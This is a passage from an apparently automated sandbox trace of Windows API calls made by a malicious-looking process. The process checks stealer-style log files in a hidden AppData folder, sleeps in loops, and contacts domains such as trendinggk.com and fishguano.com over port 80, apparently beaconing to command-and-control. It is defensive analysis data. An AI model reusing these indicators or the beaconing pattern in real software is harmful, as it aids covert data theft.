SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0224.114] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0224.114] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0224.114] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrm.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrm.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0224.114] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrm.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0224.114] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0224.114] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0224.114] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrv.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrv.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0224.114] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrv.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0224.114] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0224.114] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0224.114] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogro.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogro.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0224.114] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogro.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0224.114] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0224.115] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0224.115] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogcl.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogcl.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0224.115] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogcl.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0224.115] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0224.115] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0224.115] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogim.jpeg", NtPathName=0x26ef660, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogim.jpeg", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0224.115] NtCreateFile (in: FileHandle=0x26ef600, DesiredAccess=0x120089, ObjectAttributes=0x26ef670*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogim.jpeg", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef610, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef600*=0xffffffffffffffff, IoStatusBlock=0x26ef610*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0224.115] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef580 | out: HeapArray=0x26ef580*=0x300000) returned 0x11 [0224.115] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0224.115] Sleep (dwMilliseconds=0x7d0) [0224.130] Sleep (dwMilliseconds=0x7d0) [0224.144] Sleep (dwMilliseconds=0x7d0) [0224.160] Sleep (dwMilliseconds=0x7d0) [0224.177] Sleep (dwMilliseconds=0x7d0) [0224.191] Sleep (dwMilliseconds=0x7d0) [0224.209] Sleep (dwMilliseconds=0x7d0) [0224.222] Sleep (dwMilliseconds=0x7d0) [0224.246] Sleep (dwMilliseconds=0x7d0) [0224.254] Sleep (dwMilliseconds=0x7d0) [0224.273] Sleep (dwMilliseconds=0x7d0) [0224.284] Sleep (dwMilliseconds=0x7d0) [0224.300] Sleep (dwMilliseconds=0x7d0) [0224.316] Sleep (dwMilliseconds=0x7d0) [0224.335] Sleep (dwMilliseconds=0x7d0) [0224.347] Sleep (dwMilliseconds=0x7d0) [0224.364] Sleep (dwMilliseconds=0x7d0) [0224.383] Sleep (dwMilliseconds=0x7d0) [0224.394] Sleep (dwMilliseconds=0x7d0) [0224.409] Sleep (dwMilliseconds=0x7d0) [0224.426] Sleep (dwMilliseconds=0x7d0) [0224.441] Sleep (dwMilliseconds=0x7d0) [0224.460] Sleep (dwMilliseconds=0x7d0) [0224.473] Sleep (dwMilliseconds=0x7d0) [0224.487] Sleep (dwMilliseconds=0x7d0) [0224.503] Sleep (dwMilliseconds=0x7d0) [0224.522] socket (af=2, type=1, protocol=6) returned 0x528 [0224.524] getaddrinfo (in: pNodeName="www.trendinggk.com", pServiceName="80", pHints=0x6f0c298*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x6f0c2c8 | out: ppResult=0x6f0c2c8*=0x0) returned 11002 [0224.613] Sleep (dwMilliseconds=0x7d0) [0224.630] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlog00.ini", NtPathName=0x26ef6d0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlog00.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0224.630] NtCreateFile (in: FileHandle=0x26ef670, DesiredAccess=0x120089, ObjectAttributes=0x26ef6e0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlog00.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef680, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef670*=0xffffffffffffffff, IoStatusBlock=0x26ef680*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0224.631] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5f0 | out: HeapArray=0x26ef5f0*=0x300000) returned 0x11 [0224.631] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0224.631] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogri.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogri.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0224.631] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogri.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0224.632] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0224.632] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0224.632] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrf.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrf.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0224.632] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrf.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0224.632] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0224.632] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0224.632] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrt.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrt.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0224.632] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrt.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0224.632] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0224.632] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0224.632] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrg.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrg.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0224.632] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrg.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0224.632] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0224.632] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0224.632] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0224.632] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0224.632] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0224.632] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0224.633] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrm.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrm.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0224.633] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrm.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0224.633] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0224.633] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0224.633] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrv.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrv.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0224.633] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrv.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0224.633] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0224.633] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0224.633] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogro.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogro.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0224.633] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogro.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0224.633] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0224.633] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0224.633] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogcl.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogcl.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0224.633] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogcl.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0224.633] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0224.633] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0224.633] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogim.jpeg", NtPathName=0x26ef660, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogim.jpeg", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0224.633] NtCreateFile (in: FileHandle=0x26ef600, DesiredAccess=0x120089, ObjectAttributes=0x26ef670*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogim.jpeg", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef610, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef600*=0xffffffffffffffff, IoStatusBlock=0x26ef610*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0224.633] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef580 | out: HeapArray=0x26ef580*=0x300000) returned 0x11 [0224.634] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0224.634] Sleep (dwMilliseconds=0x7d0) [0224.643] Sleep (dwMilliseconds=0x7d0) [0224.663] Sleep (dwMilliseconds=0x7d0) [0224.675] Sleep (dwMilliseconds=0x7d0) [0224.691] Sleep (dwMilliseconds=0x7d0) [0224.738] Sleep (dwMilliseconds=0x7d0) [0224.752] Sleep (dwMilliseconds=0x7d0) [0224.768] Sleep (dwMilliseconds=0x7d0) [0224.784] Sleep (dwMilliseconds=0x7d0) [0224.800] Sleep (dwMilliseconds=0x7d0) [0224.818] Sleep (dwMilliseconds=0x7d0) [0224.830] Sleep (dwMilliseconds=0x7d0) [0224.846] Sleep (dwMilliseconds=0x7d0) [0224.862] Sleep (dwMilliseconds=0x7d0) [0224.902] Sleep (dwMilliseconds=0x7d0) [0224.909] Sleep (dwMilliseconds=0x7d0) [0224.929] Sleep (dwMilliseconds=0x7d0) [0224.940] Sleep (dwMilliseconds=0x7d0) [0224.955] Sleep (dwMilliseconds=0x7d0) [0224.971] Sleep (dwMilliseconds=0x7d0) [0224.991] Sleep (dwMilliseconds=0x7d0) [0225.004] Sleep (dwMilliseconds=0x7d0) [0225.021] socket (af=2, type=1, protocol=6) returned 0x2e4 [0225.021] getaddrinfo (in: pNodeName="www.fishguano.com", pServiceName="80", pHints=0x6f0c638*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x6f0c668 | out: ppResult=0x6f0c668*=0x6efc330*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x3f364c0*(sa_family=2, sin_port=0x50, sin_addr="34.102.136.180"), ai_next=0x0)) returned 0 [0225.078] connect (s=0x2e4, name=0x3f364c0*(sa_family=2, sin_port=0x50, sin_addr="34.102.136.180"), namelen=16) returned 0 [0225.099] send (s=0x2e4, buf=0x25a505a*, len=169, flags=0) returned 169 [0225.099] setsockopt (s=0x2e4, level=65535, optname=4102, optval="ô\x01", optlen=4) returned 0 [0225.099] recv (in: s=0x2e4, buf=0x93af040, len=2048000, flags=0 | out: buf=0x93af040*) returned 461 [0225.233] closesocket (s=0x2e4) returned 0 [0225.234] Sleep (dwMilliseconds=0x7d0) [0225.236] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlog00.ini", NtPathName=0x26ef6d0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlog00.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0225.236] NtCreateFile (in: FileHandle=0x26ef670, DesiredAccess=0x120089, ObjectAttributes=0x26ef6e0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlog00.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef680, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef670*=0xffffffffffffffff, IoStatusBlock=0x26ef680*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0225.236] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5f0 | out: HeapArray=0x26ef5f0*=0x300000) returned 0x11 [0225.236] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0225.236] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogri.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogri.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0225.236] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogri.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0225.236] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0225.237] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0225.237] RtlDosPathNameToNtPathName_U (in: 